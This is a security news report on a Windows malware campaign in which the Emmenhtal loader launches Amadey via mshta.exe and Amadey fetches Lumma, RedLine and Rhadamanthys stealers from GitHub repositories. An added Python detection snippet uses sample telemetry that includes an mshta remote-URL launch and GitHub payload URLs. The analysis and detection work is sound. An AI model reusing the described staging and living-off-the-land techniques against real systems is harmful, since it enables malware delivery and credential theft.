A sophisticated cyberattack operation is quietly under way, targeting Windows users through a multi-stage infection chain. In this campaign, the Amadey malware serves as an intermediate link used to deploy a series of data-stealing payloads. Notably, the attackers used public repositories on GitHub as payload distribution points, easily bypassing web-filtering mechanisms and traditional defenses. The incident once again shows that legitimate platforms, when abused, can become effective malware distribution channels.
The attack sequence begins with the installation of a malware downloader called Emmenhtal, also known as PEAKLIGHT. The downloader was developed in the AutoIt language, which is commonly used in legitimate automation tools, making it easy to disguise as harmless software. Emmenhtal was bundled with custom DLL libraries that implement a variety of evasion techniques, including monitoring running processes, hiding network traffic, and slowing down analysis by security professionals. Once executed, Emmenhtal connects to a remote server, downloads the Amadey malware, and launches it via the mshta.exe utility built into Windows. Abusing legitimate operating system components greatly reduces the risk of detection by security software.

After deployment, Amadey does not directly carry out complex attack behaviors; instead it acts as an intermediate platform, something like a “mini-operating system” dedicated to malicious code. Amadey can load, manage, and activate malicious plugins on demand. Each plugin performs a separate function, ranging from stealing browser login data, extracting email data, and collecting FTP and VPN credentials, to capturing the user’s screen in real time. During the campaign, Amadey was configured to connect directly to public repositories on GitHub to download additional malicious components, rather than relying on traditional C2 server infrastructure, which is more easily detected and blocked.
The attackers used at least three public GitHub accounts, including Legendary99909, DFfe9ewf, and Milidmdds, to store malicious code. These repositories contain multiple executables (.exe), libraries (.dll), and PowerShell scripts, used either as Amadey plugins or as standalone payloads. Particularly dangerous is the presence of well-known stealers such as Lumma Stealer, RedLine Stealer, and Rhadamanthys, tools that specialize in stealing login cookies, browser data, cryptocurrency information, and other sensitive data. Integrating these stealers helps the attackers maximize the value extracted from each compromised system.
Another notable technique in the campaign was the use of .txt text files on GitHub as a simple remote control panel. These files contain a list of URLs pointing to the actual payloads, giving the attackers the flexibility to change the download sequence without updating the Amadey code installed on the victim’s machine. This approach both preserves the attackers’ ability to coordinate the campaign and hides the malicious behavior in the form of ordinary text data, making detection more difficult.
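Detection logic for the two behaviours the article describes (mshta.exe launched with a remote URL, and a non-browser process fetching a GitHub-hosted .txt URL list shortly before pulling .exe/.dll/.ps1 files from GitHub), as an added example that is not part of the original article. The pipe-delimited event format, host names, process names, repository paths, IP address and the 300-second correlation window are constructed assumptions.

```python
import re

# Constructed sample telemetry (not from the article): "time|host|process|event|detail".
SAMPLE_EVENTS = """
10:00:01|WS01|emmenhtal.exe|ProcessCreate|mshta.exe https://198.51.100.7/stage2.hta
10:00:05|WS01|amadey.exe|NetConnect|https://raw.githubusercontent.com/Legendary99909/repo/main/list.txt
10:00:09|WS01|amadey.exe|NetConnect|https://github.com/DFfe9ewf/repo/raw/main/plugin.dll
10:00:12|WS01|amadey.exe|NetConnect|https://raw.githubusercontent.com/Milidmdds/repo/main/stealer.exe
10:01:00|WS02|chrome.exe|NetConnect|https://raw.githubusercontent.com/someorg/tool/main/README.txt
10:01:30|WS02|chrome.exe|NetConnect|https://github.com/someorg/tool/releases/download/v1/tool.exe
10:02:00|WS03|svchost.exe|ProcessCreate|mshta.exe C:\\Windows\\Temp\\local.hta
"""

GITHUB_HOSTS = {"github.com", "raw.githubusercontent.com", "objects.githubusercontent.com"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}   # processes expected to fetch from GitHub
PAYLOAD_EXT = (".exe", ".dll", ".ps1")                    # file types the article lists

def parse_events(text):
    """Turn the pipe-delimited lines into dicts with the time in seconds."""
    events = []
    for line in text.strip().splitlines():
        ts, host, proc, kind, detail = line.split("|", 4)
        h, m, s = map(int, ts.split(":"))
        events.append({"t": h * 3600 + m * 60 + s, "host": host,
                       "proc": proc.lower(), "kind": kind, "detail": detail})
    return events

def is_github(url):
    """True when the URL's host is one of the GitHub content hosts."""
    m = re.match(r"https?://([^/]+)/", url, re.I)
    return bool(m) and m.group(1).lower() in GITHUB_HOSTS

def detect(events, window=300):
    """Return (host, rule, detail) alerts for the two behaviours, in time order."""
    alerts, manifest_seen = [], {}   # manifest_seen: (host, proc) -> time of last .txt fetch
    for e in sorted(events, key=lambda x: x["t"]):
        if (e["kind"] == "ProcessCreate" and e["detail"].lower().startswith("mshta.exe")
                and re.search(r"https?://", e["detail"], re.I)):
            alerts.append((e["host"], "mshta_remote_url", e["detail"]))
        if e["kind"] != "NetConnect" or e["proc"] in BROWSERS or not is_github(e["detail"]):
            continue
        key, path = (e["host"], e["proc"]), e["detail"].split("?")[0].lower()
        if path.endswith(".txt"):
            manifest_seen[key] = e["t"]   # candidate URL-list ("control panel") fetch
        elif (path.endswith(PAYLOAD_EXT) and key in manifest_seen
              and e["t"] - manifest_seen[key] <= window):
            alerts.append((e["host"], "github_staged_payload", e["detail"]))
    return alerts
```

Running `detect(parse_events(SAMPLE_EVENTS))` flags only the WS01 chain: the browser on WS02 and the locally sourced mshta.exe launch on WS03 produce no alerts.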
Overall, the campaign shows a rising level of risk as legitimate platforms such as GitHub are abused to distribute malicious code. Trusting a download source solely on the basis of the platform’s apparent reputation can create serious gaps in defenses. This is a clear warning that both individual and institutional users should raise their guard, strengthen monitoring of network behavior, and carefully evaluate every file, even one that comes from a seemingly safe source.